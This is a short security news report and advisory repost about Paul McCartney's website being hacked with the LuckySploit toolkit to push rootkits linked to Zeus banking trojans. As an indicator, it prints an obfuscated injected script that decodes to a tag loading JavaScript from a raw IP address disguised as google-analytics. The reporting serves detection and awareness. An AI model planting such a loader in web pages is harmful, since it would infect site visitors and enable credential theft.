Source: scmagazineus:Complete item: http://www.scmagazineus.com/Paul-McCartneys-website-hacked-to-distribute-malware/article/130330/
Description:
The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.
The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to NoVirusThanks.org, a computer security website.
ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.
Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.
"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment.
McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.
Related:
The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.
As far as exploit toolkits go, Luckysploit is a bit unusual insasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.
Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions faciliate Zeus' activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.
Embedded scripts on impacted pages may appear as follows:
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i
Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.
Source: E-Secure-IT
https://www.e-secure-it.com
0 comments